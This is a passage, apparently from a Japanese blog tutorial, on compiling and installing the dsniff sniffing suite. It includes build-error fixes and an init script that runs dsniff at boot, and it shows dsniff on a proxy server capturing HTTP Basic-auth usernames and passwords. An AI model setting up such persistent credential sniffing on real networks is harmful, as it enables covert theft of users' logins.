gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_mountd.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_napster.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_nntp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_oracle.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_ospf.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_pcanywhere.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_pop.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_portmap.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_postgresql.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_pptp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_rip.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_rlogin.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_smb.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_smtp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_sniffer.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_snmp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_socks.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_tds.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_telnet.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_vrrp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_yp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_x11.c
gcc -o dsniff asn1.o base64.o buf.o hex.o magic.o mount.o pcaputil.o rpc.o tcp_raw.o trigger.o record.o dsniff.o decode.o decode_aim.o decode_citrix.o decode_cvs.o decode_ftp.o decode_hex.o decode_http.o decode_icq.o decode_imap.o decode_irc.o decode_ldap.o decode_mmxp.o decode_mountd.o decode_napster.o decode_nntp.o decode_oracle.o decode_ospf.o decode_pcanywhere.o decode_pop.o decode_portmap.o decode_postgresql.o decode_pptp.o decode_rip.o decode_rlogin.o decode_smb.o decode_smtp.o decode_sniffer.o decode_snmp.o decode_socks.o decode_tds.o decode_telnet.o decode_vrrp.o decode_yp.o decode_x11.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -L/usr/local/lib -lnids -lpcap -lnet -ldb -lssl -lcrypto
rpcgen -h nfs_prot.x -o nfs_prot.h
rpcgen -c nfs_prot.x -o nfs_prot.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./nfs_prot.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./filesnarf.c
gcc -o filesnarf filesnarf.o nfs_prot.o pcaputil.o rpc.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -L/usr/local/lib -lnids -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./macof.c
gcc -o macof macof.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./mailsnarf.c
gcc -o mailsnarf mailsnarf.o buf.o pcaputil.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -L/usr/local/lib -lnids -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./msgsnarf.c
./msgsnarf.c: In function ‘timestamp’:
./msgsnarf.c:56: warning: assignment makes pointer from integer without a cast
./msgsnarf.c:57: warning: incompatible implicit declaration of built-in function ‘strftime’
gcc -o msgsnarf msgsnarf.o buf.o pcaputil.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -L/usr/local/lib -lnids -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./sshmitm.c
./sshmitm.c:44: warning: built-in function ‘csin’ declared as non-function
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./ssh.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./sshcrypto.c
gcc -o sshmitm sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lnet -ldb -lssl -lcrypto
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./tcpkill.c
gcc -o tcpkill tcpkill.o pcaputil.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./tcpnice.c
gcc -o tcpnice tcpnice.o pcaputil.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./urlsnarf.c
gcc -o urlsnarf urlsnarf.o base64.o buf.o pcaputil.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -L/usr/local/lib -lnids -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./webmitm.c
./webmitm.c:46: warning: built-in function ‘csin’ declared as non-function
gcc -o webmitm webmitm.o base64.o buf.o decode_http.o record.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lnet -ldb -lssl -lcrypto

5)リンク
wirehork:/usr/local/src/dsniff-2.3# make install
test -d /usr/local/sbin || \
/usr/bin/install -c -d /usr/local/sbin
for file in arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm tcpkill tcpnice urlsnarf webmitm ; do \
/usr/bin/install -c -m 755 $file /usr/local/sbin; \
done
test -d /usr/local/lib || \
/usr/bin/install -c -d /usr/local/lib
for file in dsniff.magic dsniff.services dnsspoof.hosts; do \
/usr/bin/install -c -m 644 $file /usr/local/lib; \
done
test -d /usr/local/man/man8 || \
/usr/bin/install -c -d /usr/local/man/man8
for file in *.8; do \
/usr/bin/install -c -m 644 $file /usr/local/man/man8; \
done

6)エラーの対処(旨い具合に行かなかったとき)
make時にエラーが出まくったので、それに対する対処を記す。
■エラー1
省略
mut_pthread.c:(.text+0xa1): undefined reference to `pthread_mutex_trylock’
/usr/lib/gcc/i486-linux-gnu/4.1.3/../../../../lib/libdb.a(mut_pthread.o): In function `__db_pthread_mutex_init’:
mut_pthread.c:(.text+0x1b1): undefined reference to `pthread_mutexattr_destroy’
mut_pthread.c:(.text+0x259): undefined reference to `pthread_condattr_setpshared’
mut_pthread.c:(.text+0x26a): undefined reference to `pthread_mutexattr_init’
mut_pthread.c:(.text+0x283): undefined reference to `pthread_mutexattr_setpshared’
collect2: ld returned 1 exit status
make: *** [dsniff] Error 1

このようなエラーが出た場合は、以下のようにMakefileのLIBSにオプションを追加してもう一度makeする。
wirehork:/usr/local/src/dsniff-2.3# vi Makefile
省略
INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \
-I$(srcdir)/missing
LIBS = -lresolv -lnsl -lrpcsvc -L$(srcdir) -lpthread -lmissing       ← -lpthreadを追加
省略

■エラー2
省略
./sshcrypto.c: In function ‘des3_decrypt’:
./sshcrypto.c:189: error: ‘struct des3_state’ has no member named ‘iv1’
./sshcrypto.c:189: error: ‘struct des3_state’ has no member named ‘iv2’
./sshcrypto.c:191: error: ‘struct des3_state’ has no member named ‘k3’
./sshcrypto.c:191: error: ‘struct des3_state’ has no member named ‘iv3’
./sshcrypto.c:191: error: ‘DES_DECRYPT’ undeclared (first use in this function)
./sshcrypto.c:192: error: ‘struct des3_state’ has no member named ‘k2’
./sshcrypto.c:192: error: ‘struct des3_state’ has no member named ‘iv2’
./sshcrypto.c:192: error: ‘DES_ENCRYPT’ undeclared (first use in this function)
./sshcrypto.c:193: error: ‘struct des3_state’ has no member named ‘k1’
./sshcrypto.c:193: error: ‘struct des3_state’ has no member named ‘iv1’
make: *** [sshcrypto.o] Error 1

このようなエラーが出た場合は、sshcrypto.cの先頭にインクルードヘッダーを追加して、もう一度makeする。
wirehork:/usr/local/src/dsniff-2.3# vi sshcrypto.c
/*
sshcrypto.c

SSH-1 crypto routines, adapted from OpenSSH.

Copyright (c) 2000 Dug Song <dugsong@monkey.org>
Copyright (c) 2000 Niels Provos <provos@monkey.org>
Copyright (c) 2000 Markus Friedl <markus@openbsd.org>

$Id: sshcrypto.c,v 1.4 2000/11/28 21:23:28 dugsong Exp $
*/

#include “config.h”

#include <sys/types.h>
#include <openssl/ssl.h>
#include <openssl/blowfish.h>
#include <openssl/des.h>             ←追加
#include <openssl/des_old.h>          ←追加
省略

7)自動起動ファイルを作る
wirehork:/usr/local/src/dsniff-2.3# vi /etc/init.d/dsniff
#!/bin/bash
case “$1” in
start)
echo -n “Starting dsniff : “
/usr/local/sbin/dsniff -m -n -w /var/log/sniffer.log &
echo
;;
stop)
echo -n “Stopping dsniff : “
/usr/bin/killall dsniff 2>&1
echo
;;
status)
/bin/ps -ef | grep dsniff
;;
restart|reload)
$0 stop
$0 start
;;
*)
echo “Usage: dsniff {start|stop|status|restart}”
exit 1
esac

exit 0

wirehork:/usr/local/src/dsniff-2.3# chmod 755 /etc/init.d/dsniff

8)起動・停止
wirehork:/usr/local/src/dsniff-2.3# /etc/init.d/dsniff start or stop

3.実際に使う

1)コマンドオプションの紹介
プロトコルを自動的に判別させる : dsniff -m
リアルタイムで動作させる     : dsniff -n
指定のファイルへ書き込む    : dsniff -n -w <ファイル名>
DBの記録を読む         : dsniff -r <ファイル名>

2)使う(例として、ApacheのBasic認証情報を盗聴する)
自動起動スクリプトの起動コマンドオプションが、
/usr/local/sbin/dsniff -m -n -w /var/log/sniffer.log &
となっているため、/var/logディレクトリにsniffer.logと言うDBが作られる。以下のsniffer.logの結果は、図1に書かれたようなリバースプロキシを使ったネットワーク環境の場合に、Proxyサーバにdsniffを仕掛けて起動させておく。その時にBasic認証が必要なイントラネットのHTTPパケットを盗聴した結果である。ご覧いただければ解るように、Proxyを中継したクライアントのユーザーとパスワード情報がDBにハッキリと書き込まれている。こういう形にProxyサーバに「-m」オプションで起動しておくと、認証情報を含んだ色々なTCP/IPパケットを盗聴できてしまう。

図1

wirehork:/usr/local/src/dsniff-2.3# cd /var/log

wirehork:/var/log# dsniff -r sniffer.log
—————–
11/14/07 14:47:59 tcp 192.168.0.25.64654 -> wirehork.xxxxxxxxxxxxxxx.co.jp.8080 (http)
GET http://intra2.xxxxxxxxxxxxxxx.co.jp/wiz/images/ HTTP/1.1
Host: intra2.xxxxxxxxxxxxxxx.co.jp
Authorization: Basic **********************== [hoge:abcd1234]

GET http://intra2.xxxxxxxxxxxxxxx.co.jp/wiz/images/ HTTP/1.1
Host: intra2.xxxxxxxxxxxxxxx.co.jp
Authorization: Basic **********************== [hoge:abcd1234]

以上

コメント